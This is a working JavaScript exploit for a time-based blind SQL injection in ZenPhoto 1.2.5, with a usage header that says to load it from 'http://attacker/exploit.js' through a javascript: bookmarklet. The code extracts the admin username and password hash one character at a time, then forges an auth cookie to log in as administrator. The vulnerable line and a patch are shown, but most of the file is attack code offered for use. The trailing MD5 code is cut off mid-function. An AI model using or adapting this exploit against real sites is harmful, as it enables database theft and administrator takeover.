/* * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category * * What does this exploit let you do: * The precoded functions I provided will allow you to extract the username and password hash of the admin from the database. * It will also let you login to the admin panel w/o actually knowing the plain text password (only the username and hash are required) * * How To Use: * 1) upload this script to http://attacker/exploit.js * 2) open a vulnerable category in your webbrowser (Example: http://victim/zenphoto/news/category/anycategorynamehere) * 3) Enter the following code into your address bar: * javascript:(function(){var url = "http://attacker/exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})(); * 4) Press enter and wait for the exploit console to show * 5) You may now extract the username/password hash from the database (buggy :( ) * 6) Use the username/password hash with the Login Emulation tool to login to the admin panel * 7) Have fun :) * * WARNING: THIS IS BUGGY! You might not get the hash/username correct the first time. Play with the settings below to tweak it so it works better for you * * Why this works: * The sanitize function doesn't escape single quotes... * * Vulnerable Code (index.php): * 95: $catname = sanitize($_GET['category']); * 96: query("UPDATE ".prefix('zenpage_news_categories')." SET `hitcounter` = `hitcounter`+1 WHERE `cat_link` = '".$catname."'",true); * * Patch: * 95: $catname = mysql_real_escape_string($_GET['category']); * * Example Exploitation: * /zenphoto/news/category/cat1' and hitcounter = (SELECT IF(SUBSTRING(password,1 ,1) = 'A',BENCHMARK(5000000,ENCODE('this will probably','waste some time')),null) FROM zp_administrators) and '1' = '1 * * This payload will delay the page from loading for about 5 seconds if the first letter of the password hash is 'A' * * The time detection isn't perfect and was pretty much slapped together. Make sure you try editing the variables below or * make your own injector :P * * Discovered and Coded by petros@dusecurity.com * Shoutz to xplorer and the rest of the DuSec Team */ // Change this if you are having problems with the injection var patience = .8; // Time in seconds on how patient we are. Will be substracted from the benchmark time var max_retries = 3; // maximum retries after failed HTTP request var charset_hash = "0123456789abcdef".split(''); // charset for the password hash var charset_username = "abcdefghiklmnopqrstuvqxzy0123456789ABCEDFGHIJKLMNOPQRSTUVWXYZ ._".split(''); // charset for the username var username_max = 64; // max length of the username var hash_max = 32; // max length of password hash (its md5..i wouldnt change this) var benchmark_code = "BENCHMARK(5850000,ENCODE('this will probably','waste some time'))"; // code used to slow down requests if the query is true var show_timing = false; // whether or not to show the timings of each request (good for debugging) var delay = 1500; // delay in miliseconds between request var err_delay = 1000; //delay in miliseconds to wait after an error // Dont edit below this line var display = false; var display_loot = false; var loot = false; var loot_username = false; var loot_password = false; function get(page) // returns how long it took to send/receive the request... { var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest(); xhr.open('GET', page, false); // keep it syncronized.. xhr.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" ); // cache.. var seconds = getTime(); xhr.send(null); seconds = getTime() - seconds; var success = (xhr.readyState == 4 && xhr.status == 200); xhr = null; // dispose return { 'miliseconds': seconds, 'seconds': seconds / 1000, 'success': success }; } function getTime() { return Math.round(new Date().getTime()); } function createDisplay() // create the display div { var div = document.createElement("DIV"); div.style.backgroundColor = '#C3FFB9'; div.style.border = '2px dashed green'; div.style.margin = '3px'; div.style.paddingLeft = '10px'; div.style.paddingBottom = '10px'; div.innerHTML = '

ZenPhoto Blind Injection -- petros@dusecurity

'; display = document.createElement("P"); document.body.insertBefore(div, document.body.childNodes[0]); div.appendChild(display); } function write(text) { display.innerHTML += text + "
"; } function setDisplay(text) { display.innerHTML = text; } function clearDisplay() { display.innerHTML = ''; } function getPath() { return window.location.pathname; } function showMenu() { clearDisplay(); write('What you like to do?'); var ul = document.createElement('OL'); // changed to OL so they know to do it in steps createListItem('Extract Admin Username', 'extractusername();',ul); createListItem('Extract Admin Password','extractpassword();',ul); createListItem('Login to Admin using Hash', 'adminlogin();', ul); display.appendChild(ul); } var un; var pw; function adminlogin() { clearDisplay(); write("Admin Login Emulator: "); un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]'); pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]'); createButton('Pwn!', "step2();"); write('
Back To Menu'); } function step2() { var username = un.value; var password = pw.value; var auth =MD5(username + password); SetCookie('zenphoto_auth', MD5(username + password), 30); clearDisplay(); write("Generated auth cookie: zenphoto_auth=" + auth); write("You are now logged in with admin privileges :)"); write('Enter Admin Panel'); write('
Back To Menu'); } function createTextbox(label, value) { display.innerHTML += "" + label + ""; var tb = document.createElement('input'); tb.type = 'text'; tb.value = value; display.appendChild(tb); write(''); return tb; } function createButton(text, click) { write(""); } function addEvent(elem, type, handle) { if (elem.addEventListener) elem.addEventListener(type, handle, false); else if (elem.attachEvent) elem.attachEvent("on" + type, handle); } // borrowed function function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString() + ";path=../../"; } function extractusername() { clearDisplay(); var path = getPath(); var basetime = 0; var benchmark = 0; var diff = 0; var offset = 0; var charset_len = charset_username.length; var resp = false; loot = ''; display_loot = false; write("Extracting username.."); write("Using path: " + path); resp = get(path); if(!resp.success) { write("Failed to request page."); return; } basetime = resp.miliseconds; write("Normal request time set to " + basetime + " milisecond(s)"); resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); benchmark = resp.miliseconds; diff = benchmark - basetime; if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();} write("Benchmark request time set to " + benchmark + " milisecond(s)"); if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} write("Username:
"); display_loot = document.getElementById('loot'); var retries = 0; var min = diff - (patience * 1000); var best_match = 0; var best = ''; if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} function readNextChar() { var c = charset_username[offset]; display_loot.innerHTML = ''; display_loot.innerHTML += loot + c; resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} retries = 0; //reset error counter var took = resp.miliseconds - basetime; //difference if(took > 0 && best_match < took) {best_match = took; best = c;} if(show_timing) write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); if(took >= min) { loot += c; if(show_timing) write("got \"" + loot + "\" so far..."); display_loot.innerHTML = ''; display_loot.innerHTML += loot; best = ''; best_match = 0; offset = 0; } else offset++; if(loot.length >= username_max) { display_loot.innerHTML = ''; display_loot += loot; loot_username = loot; write('Back To Menu'); alert("Admin Username is \"" + loot + "\"\r\n(reached max length)"); return; } if(offset < charset_len) setTimeout(readNextChar, delay); else { if(loot.length < username_max) { write("best match: " + best_match); function beAnAsshole(){ loot += best; best = ''; best_match = 0; display_loot.innerHTML = ''; display_loot.innerHTML += loot; offset = 0; setTimeout(readNextChar, delay); return;} } display_loot.innerHTML = ''; display_loot.innerHTML += loot; loot_username = loot; write('Back To Menu'); alert("Admin Username is \"" + loot + "\""); } } readNextChar(); } function extractpassword() { clearDisplay(); var path = getPath(); var basetime = 0; var benchmark = 0; var diff = 0; var offset = 0; var charset_len = charset_hash.length; var resp = false; loot = ''; display_loot = false; write("Extracting password.."); write("Using path: " + path); resp = get(path); if(!resp.success) { write("Failed to request page."); return; } basetime = resp.miliseconds; write("Normal request time set to " + basetime + " milisecond(s)"); resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); benchmark = resp.miliseconds; write("Benchmark request time set to " + benchmark + " milisecond(s)"); if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} write("Password:
"); display_loot = document.getElementById('loot'); var retries = 0; diff = benchmark - basetime; if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;} var min = diff- (patience * 1000); var best_match = 0; var best = ''; if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} function readNextChar() { var c = charset_hash[offset]; display_loot.innerHTML = ''; display_loot.innerHTML += loot + c; resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} var took = resp.miliseconds - basetime; retries = 0; if(took > 0 && took > best_match) {best_match = took; best = c;} if(show_timing) write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); if(took >= min) { loot += c; display_loot.innerHTML = ''; display_loot.innerHTML += loot; offset = 0; best = ''; best_match = 0; } else offset++; if(loot.length >= hash_max) { display_loot.innerHTML = ''; display_loot += loot; loot_password = loot; write('Back To Menu'); alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)"); return; } if(offset < charset_len) setTimeout(readNextChar, delay); else { if(loot.length < hash_max) { loot += best; best = ''; best_match = 0; display_loot.innerHTML = ''; display_loot.innerHTML += loot; offset = 0; setTimeout(readNextChar, delay); return; } display_loot.innerHTML = ''; display_loot.innerHTML += loot; loot_password = loot; write('Back To Menu'); alert("Admin Password Hash is \"" + loot + "\""); } } readNextChar(); } function createListItem(label, onclick, list) { var li = document.createElement("LI"); li.innerHTML = '' + label + ""; list.appendChild(li); } createDisplay(); showMenu(); /** * * MD5 (Message-Digest Algorithm) * http://www.webtoolkit.info/ * **/ var MD5 = function (string) { function RotateLeft(lValue, iShiftBits) { return (lValue<>>(32-iShiftBits)); } function AddUnsigned(lX,lY) { var lX4,lY4,lX8,lY8,lResult; lX8 = (lX & 0x80000000); lY8 = (lY & 0x80000000); lX4 = (lX & 0x40000000); lY4 = (lY & 0x40000000); lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF); if (lX4 & lY4) { return (lResult ^ 0x80000000 ^ lX8 ^ lY8); } if (lX4 | lY4) { if (lResult & 0x40000000) { return (lResult ^ 0xC0000000 ^ lX8 ^ lY8); } else { return (lResult ^ 0x40000000 ^ lX8 ^ lY8); } } else { return (lResult ^ lX8 ^ lY8); } } function F(x,y,z) { return (x & y) | ((~x) & z); } function G(x,y,z) { return (x & z) | (y & (~z)); } function H(x,y,z) { return (x ^ y ^ z); } function I(x,y,z) { return (y ^ (x | (~z))); } function FF(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); }; function GG(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); }; function HH(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); }; function II(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); }; function ConvertToWordArray(string) { var lWordCount; var lMessageLength = string.length; var lNumberOfWords_temp1=lMessageLength + 8; var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64; var lNumberOfWords = (lNumberOfWords_temp2+1)*16; var lWordArray=Array(lNumberOfWords-1); var lBytePosition = 0; var lByteCount = 0; while ( lByteCount < lMessageLength ) { lWordCount = (lByteCount-(lByteCount % 4))/4; lBytePosition = (lByteCount % 4)*8; lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29; return lWordArray; }; function WordToHex(lValue) { var WordToHexValue="",WordToHexValue_temp="",lByte,lCount; for (lCount = 0;lCount<=3;lCount++) { lByte = (lValue>>>(lCount*8)) & 255; WordToHexValue_temp = "0" + lByte.toString(16); WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2); } return WordToHexValue; }; function Utf8Encode(string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; }; var x=Array(); var k,AA,BB,CC,DD,a,b,c,d; var S11=7, S12=12, S13=17, S14=22; var S21=5, S22=9 , S23=14, S24=20; var S31=4, S32=11, S33=16, S34=23; var S41=6, S42=10, S43=15, S44=21; string = Utf8Encode(string); x = ConvertToWordArray(string); a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476; for (k=0;k